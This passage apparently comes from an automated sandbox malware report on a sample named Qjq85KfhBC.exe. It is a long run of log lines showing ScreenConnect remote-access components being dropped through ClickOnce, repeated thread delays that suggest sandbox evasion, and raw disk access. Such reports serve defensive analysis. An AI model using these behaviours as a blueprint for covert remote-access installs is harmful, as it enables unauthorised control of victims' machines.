                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 21CD0040000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 21CE8220000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1B280000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 1070000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 2AA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 28E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 1910000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 1AA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 3AA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 730000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1A370000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599763Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599523Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599371Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599263Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597947Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597666Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597435Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597327Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596013Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595793Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595682Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595575Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594966Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593545Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593314Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593077Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592795Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592684Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592550Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592433Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592280Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 6692Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2896Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe TID: 7644Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -599874s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -599763s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -599523s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -599371s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -599263s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -599094s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -598234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597947s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597666s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597547s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597435s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597327s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -597000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -596013s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -595906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -595793s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -595682s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -595575s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -595328s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -595187s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -595078s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594966s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594859s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594750s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594640s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594531s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594422s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594312s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594203s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -594094s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593984s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593765s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593545s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593314s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593187s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -593077s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -592954s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -592795s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -592684s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -592550s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -592433s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -592280s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7972Thread sleep time: -592172s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 6464Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 2896Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 2916Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 4420Thread sleep count: 298 > 30
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 7784Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 5292Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00914A4B FindFirstFileExA,0_2_00914A4B
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599763Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599523Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599371Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599263Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597947Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597666Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597435Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597327Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596234Jump to behavior
